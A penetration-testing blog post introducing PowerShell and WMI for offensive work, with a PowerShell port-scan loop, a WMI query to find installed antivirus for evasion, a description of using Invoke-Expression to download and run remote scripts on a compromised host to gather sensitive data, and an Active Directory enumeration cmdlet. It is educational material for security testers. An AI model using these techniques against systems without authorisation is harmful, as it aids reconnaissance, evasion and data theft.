• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer

War Room

Shells from above

RSM logo

  • Home
  • About
  • Blog
  • Talks/Whitepapers
  • Tools
  • Recreation
Home > Offense > WMI & PowerShell for Offensive Security

WMI & PowerShell for Offensive Security

January 24, 2022 By Kevin Randall

As a penetration tester, learning how to use a CLI (Command Line Interface) is a necessary skill as there are many times where an interactive interface such as Remote Desktop won’t be available. Starting with a standard command prompt for Windows (cmd.exe) is a great start. However, there are more advanced and feature rich CLI interfaces. Two of which are WMI (Windows Management Instrumentation) and PowerShell.

PowerShell is a command line interface and .NET scripting language that has been around since Windows 2003 as an optional add on and not a part of the standard installation. PowerShell is useful for many system administrators to perform day to day tasks and these same features can be used for Offensive Security as well. To access PowerShell, click on the Windows Start icon, and type “powershell.exe” and you will see the following.

Go ahead and click on it.

Afterwards, you will see a blue prompt like the following:

The same commands from “cmd.exe” apply but there are other nice features for those who are more familiar with Linux. An example of this is the ability to use the “ls” command. “ls” works in PowerShell but not Command Prompt as shown below:

Command Prompt “ls”
PowerShell “ls”

PowerShell uses what are called cmdlets. Cmdlets are in summary commands that you can run which can perform automated tasks. Example Cmdlets include Get-NetAdapter, Get-Process, GetADUser and others. The format of Cmdlets follow (Verb-Action) format. Cmdlets can be used to write PowerShell scripts (.ps1 files) or work from the PowerShell CLI similar what you would use from a command prompt. If you want to find out how to use a particular PowerShell cmdlet, you can use the Get-Help before any cmdlet as seen below:

Using PowerShell for Offensive Security is where things are very interesting. There are many times during a penetration test where you cannot install tools on client systems, and you need to use only the features available on the compromised system. This concept is called “Living off the land” which is summary is working with the cards you’re dealt. Many penetration testers would use Nmap for conducting a port scan but you can also perform the same thing with using native PowerShell. You can run the following to perform a port scan using PowerShell:

foreach ($ip in 1..2) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.0.$ip}

You can also use WMI with PowerShell by using the Get-WmiObject cmdlet. Get-WmiObject is the PowerShell cmdlet for using WMI

During the post exploitation process, you may need to identify the Anti-Virus product or EDR (Endpoint Detection and Response) software that you may need to evade when conducting your post exploitation activities. You can use WMI to identify the Anti-Virus product installed on the client system using a cmdlet such like the following example:

Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct | Select-Object displayName

Another common and very useful way to use PowerShell for Offensive Security is to use Invoke-Expression (IEX). IEX is an alias for the Invoke-Expression cmdlet within PowerShell. You can use Invoke-Expression to download arbitrary scripts from sites such as Github or other locations and run them in on the compromised host. The following is an example of using IEX for running a PowerShell script called SessionGopher to gather sensitive information on the compromised machine:

PowerShell is also very useful when it comes to enumerating Active Directory. Common cmdlets such as Get-ADUser can be used to find out information about a particular user account on an Active Directory domain. Cmdlet such as the following example are useful for gathering this information:

Get-ADUser -Identity (USERID)

These are just some common examples of using PowerShell for Offensive Security and there is a wealth of information that covers this more in depth.

Share this...
  • Reddit
  • Email
  • Facebook
  • Twitter
  • Linkedin

Kevin Randall

Primary Sidebar

Categories

  • Defense
  • Forensics
  • Offense
  • Physical
  • R&D

Most Viewed Posts

  • DLL Injection Part 1: SetWindowsHookEx 10.8k views
  • Sophos UTM Home Edition – 3 – The Setup 10.8k views
  • Leveraging MS16-032 with PowerShell Empire 10k views
  • Bypassing Gmail’s Malicious Macro Signatures 9.8k views
  • How to Bypass SEP with Admin Access 8.9k views

Footer

  • RSS
  • Twitter
  • Tools
  • About
  • RSM US LLP

+1 800 903 6264

1 S Wacker Dr Suite 800
Chicago, IL 60606

Copyright © 2023 RSM US LLP. All rights reserved. RSM US LLP is a limited liability partnership and the U.S. member firm of RSM International, a global network of independent audit, tax and consulting firms. The member firms of RSM International collaborate to provide services to global clients, but are separate and distinct legal entities that cannot obligate each other. Each member firm is responsible only for its own acts and omissions, and not those of any other party. Visit for more information regarding RSM US LLP and RSM International.